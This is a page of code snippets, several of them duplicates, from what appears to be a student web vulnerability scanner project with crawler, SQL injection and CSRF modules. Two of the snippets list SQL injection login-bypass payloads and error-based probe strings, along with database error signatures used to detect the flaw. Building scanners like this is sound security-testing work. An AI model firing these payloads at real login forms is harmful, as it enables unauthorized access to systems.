コード例 #1
0
ファイル: crawler.py プロジェクト: 0xJCG/tfg-krashr
    def __init__(self, process, root):
        self.queue = URLlist()
        self.queue.put_url(root)
        self.final_list = URLlist()
        self.final_list.put_url(root)

        db = DBAdapter()
        db.update_process(process, 2)  # Status: 2, crawling.
        db.close_connection()
コード例 #2
0
ファイル: sql_injection.py プロジェクト: 0xJCG/tfg-krashr
    def __save_results(self, web, v_type):
        w = web.get_url()
        db = DBAdapter()
        db.vulnerability_found(self.process, w, v_type)
        db.close_connection()

        if v_type == 1:
            v = "Authentication attempt"
        elif v_type == 2:
            v = "Error based SQL injection"
        else:
            v = "SQL injection"

        data = {
            "PROCESS": self.process,
            "WEB": w,
            "VULNERABILITY": v,
            "USER": self.user
        }
        requests.post(api, json=data)
コード例 #3
0
ファイル: crawler.py プロジェクト: 0xJCG/krashr-backend
    def __init__(self, process, root):
        self.queue = URLlist()
        self.queue.put_url(root)
        self.final_list = URLlist()
        self.final_list.put_url(root)

        db = DBAdapter()
        db.update_process(process, 2)  # Status: 2, crawling.
        db.close_connection()
コード例 #4
0
    def __init__(self, url_list, process, user):
        self.process = process
        self.user = user

        if url_list is None:
            self.url_list = URLlist()
        else:
            self.url_list = url_list

        db = DBAdapter()
        db.update_process(process, 4)  # Status: 4, csrf search.
        db.close_connection()
コード例 #5
0
    def __save_results(self, web, v_type):
        w = web.get_url()
        db = DBAdapter()
        db.vulnerability_found(self.process, w, v_type)
        db.close_connection()

        data = {
            "PROCESS": self.process,
            "WEB": w,
            "VULNERABILITY": "CSRF",
            "USER": self.user
        }
        requests.post(api, json=data)
コード例 #6
0
ファイル: sql_injection.py プロジェクト: 0xJCG/krashr-backend
    def __init__(self, url_list, process, user):
        self.process = process
        self.user = user

        if url_list is None:
            self.url_list = URLlist()
        else:
            self.url_list = url_list

        db = DBAdapter()
        db.update_process(process, 3)  # Status: 3, SQL injection search.
        db.close_connection()

        # http://stackoverflow.com/questions/9626535/get-domain-name-from-url
        # self.domain = "{0.scheme}://{0.netloc}/".format(urllib.parse.urlsplit(url))

        # http://www.hacoder.com/2015/10/sql-injection-authentication-bypass-cheat-sheet/
        self.input_data = [
            'admin\'--', '\' or 1=1', ' or 1=1', 'or 1=1--', 'or 1=1#',
            'or 1=1/*', 'admin\' #', 'admin\'/*', 'admin\' or \'1\'=\'1',
            'admin\' or \'1\'=\'1\'--', 'admin\' or \'1\'=\'1\'#',
            'admin\' or \'1\'=\'1\'/*', 'admin\'or 1=1 or \'\'=\'',
            'admin\' or 1=1', 'admin\' or 1=1--', 'admin\' or 1=1#',
            'admin\' or 1=1/*', 'admin\') or (\'1\'=\'1',
            'admin\') or (\'1\'=\'1\'--', 'admin\') or (\'1\'=\'1\'#',
            'admin\') or (\'1\'=\'1\'/*', 'admin\') or \'1\'=\'1',
            'admin\') or \'1\'=\'1\'--', 'admin\') or \'1\'=\'1\'#',
            'admin\') or \'1\'=\'1\'/*', 'admin" --', 'admin" #', 'admin"/*',
            'admin" or "1"="1', 'admin" or "1"="1"--', 'admin" or "1"="1"#',
            'admin" or "1"="1"/*', 'admin"or 1=1 or ""="', 'admin" or 1=1',
            'admin" or 1=1--', 'admin" or 1=1#', 'admin" or 1=1/*',
            'admin") or ("1"="1', 'admin") or ("1"="1"--',
            'admin") or ("1"="1"#', 'admin") or ("1"="1"/*',
            'admin") or "1"="1', 'admin") or "1"="1"--', 'admin") or "1"="1"#',
            'admin") or "1"="1"/*'
        ]

        self.error_based_sqli_param_data = [
            '\'', 'A%\' and 1=1--', 'A%\' and 1=2--'
        ]

        # self.serialized_param_data = []

        # https://www.owasp.org/images/5/52/OWASP_Testing_Guide_v4.pdf, page 111.
        self.sql_errors = {
            'MySQL': 'you have an error in your sql syntax',
            'MSSQL': 'microsoft sql native client error',
            'Oracle': 'ora-00933: sql command not properly ended',
            'PostgreSQL': 'query failed: error: syntax error at or near'
        }
コード例 #7
0
ファイル: sql_injection.py プロジェクト: 0xJCG/krashr-backend
    def __save_results(self, web, v_type):
        w = web.get_url()
        db = DBAdapter()
        db.vulnerability_found(self.process, w, v_type)
        db.close_connection()

        if v_type == 1:
            v = "Authentication attempt"
        elif v_type == 2:
            v = "Error based SQL injection"
        else:
            v = "SQL injection"

        data = {
            "PROCESS": self.process,
            "WEB": w,
            "VULNERABILITY": v,
            "USER": self.user
        }
        requests.post(api, json=data)
コード例 #8
0
ファイル: sql_injection.py プロジェクト: 0xJCG/tfg-krashr
    def __init__(self, url_list, process, user):
        self.process = process
        self.user = user

        if url_list is None:
            self.url_list = URLlist()
        else:
            self.url_list = url_list

        db = DBAdapter()
        db.update_process(process, 3)  # Status: 3, SQL injection search.
        db.close_connection()

        # http://stackoverflow.com/questions/9626535/get-domain-name-from-url
        # self.domain = "{0.scheme}://{0.netloc}/".format(urllib.parse.urlsplit(url))

        # http://www.hacoder.com/2015/10/sql-injection-authentication-bypass-cheat-sheet/
        self.input_data = [
            'admin\'--',
            '\' or 1=1',
            ' or 1=1',
            'or 1=1--',
            'or 1=1#',
            'or 1=1/*',
            'admin\' #',
            'admin\'/*',
            'admin\' or \'1\'=\'1',
            'admin\' or \'1\'=\'1\'--',
            'admin\' or \'1\'=\'1\'#',
            'admin\' or \'1\'=\'1\'/*',
            'admin\'or 1=1 or \'\'=\'',
            'admin\' or 1=1',
            'admin\' or 1=1--',
            'admin\' or 1=1#',
            'admin\' or 1=1/*',
            'admin\') or (\'1\'=\'1',
            'admin\') or (\'1\'=\'1\'--',
            'admin\') or (\'1\'=\'1\'#',
            'admin\') or (\'1\'=\'1\'/*',
            'admin\') or \'1\'=\'1',
            'admin\') or \'1\'=\'1\'--',
            'admin\') or \'1\'=\'1\'#',
            'admin\') or \'1\'=\'1\'/*',
            'admin" --',
            'admin" #',
            'admin"/*',
            'admin" or "1"="1',
            'admin" or "1"="1"--',
            'admin" or "1"="1"#',
            'admin" or "1"="1"/*',
            'admin"or 1=1 or ""="',
            'admin" or 1=1',
            'admin" or 1=1--',
            'admin" or 1=1#',
            'admin" or 1=1/*',
            'admin") or ("1"="1',
            'admin") or ("1"="1"--',
            'admin") or ("1"="1"#',
            'admin") or ("1"="1"/*',
            'admin") or "1"="1',
            'admin") or "1"="1"--',
            'admin") or "1"="1"#',
            'admin") or "1"="1"/*'
        ]

        self.error_based_sqli_param_data = [
            '\'',
            'A%\' and 1=1--',
            'A%\' and 1=2--'
        ]

        # self.serialized_param_data = []

        # https://www.owasp.org/images/5/52/OWASP_Testing_Guide_v4.pdf, page 111.
        self.sql_errors = {
            'MySQL': 'you have an error in your sql syntax',
            'MSSQL': 'microsoft sql native client error',
            'Oracle': 'ora-00933: sql command not properly ended',
            'PostgreSQL': 'query failed: error: syntax error at or near'
        }
コード例 #9
0
    def start(self, call):
        c = self.__check_call(call)
        if c == 1:  # Search option.
            if self.__is_valid_url():
                self.__check_modules()
                url_list = URLlist()

                db = DBAdapter()
                process = db.new_process(self.url, self.user, 1,
                                         1)  # Status: 1, processing.
                db.close_connection()

                if process == 0:  # The user has a search going on.
                    return {"response": False}

                url_list.put_url(self.url)

                for action in self.actions:  # Going through the required modules by the API.
                    if action[
                            'module']:  # Looking if the required module is active.
                        if action['number'] == 1:
                            from backend.modules.crawler.module import main
                            url_list = main(process, self.url)
                        else:
                            if action['number'] == 2:
                                from backend.modules.sqlinjection.module import main
                                main(url_list, process, self.user)
                            elif action['number'] == 3:
                                from backend.modules.csrf.module import main
                                main(url_list, process, self.user)
                            else:
                                continue

                db = DBAdapter()
                db.update_process(process, 5)  # Status: 5, finished.
                db.close_connection()
        elif c == 2:  # Get status option.
            db = DBAdapter()
            process = db.get_current_process_status(self.user)
            db.close_connection()

            if process is None:
                return {"response": False}
            data = {
                "web": process[1],
                "date": process[2],
                "stype": process[0],
                "status": process[3]
            }
            return data
        else:  # Wrong call.
            return {"response": False}

        return True  # If we get here, everything was right.
コード例 #10
0
ファイル: core.py プロジェクト: 0xJCG/tfg-krashr
    def start(self, call):
        c = self.__check_call(call)
        if c == 1:  # Search option.
            if self.__is_valid_url():
                self.__check_modules()
                url_list = URLlist()

                db = DBAdapter()
                process = db.new_process(self.url, self.user, 1, 1)  # Status: 1, processing.
                db.close_connection()

                if process == 0:  # The user has a search going on.
                    return {"response": False}

                url_list.put_url(self.url)

                for action in self.actions:  # Going through the required modules by the API.
                    if action['module']:  # Looking if the required module is active.
                        if action['number'] == 1:
                            from backend.modules.crawler.module import main
                            url_list = main(process, self.url)
                        else:
                            if action['number'] == 2:
                                from backend.modules.sqlinjection.module import main
                                main(url_list, process, self.user)
                            elif action['number'] == 3:
                                from backend.modules.csrf.module import main
                                main(url_list, process, self.user)
                            else:
                                continue

                db = DBAdapter()
                db.update_process(process, 5)  # Status: 5, finished.
                db.close_connection()
        elif c == 2:  # Get status option.
            db = DBAdapter()
            process = db.get_current_process_status(self.user)
            db.close_connection()

            if process is None:
                return {"response": False}
            data = {
                "web": process[1],
                "date": process[2],
                "stype": process[0],
                "status": process[3]
            }
            return data
        else:  # Wrong call.
            return {"response": False}

        return True  # If we get here, everything was right.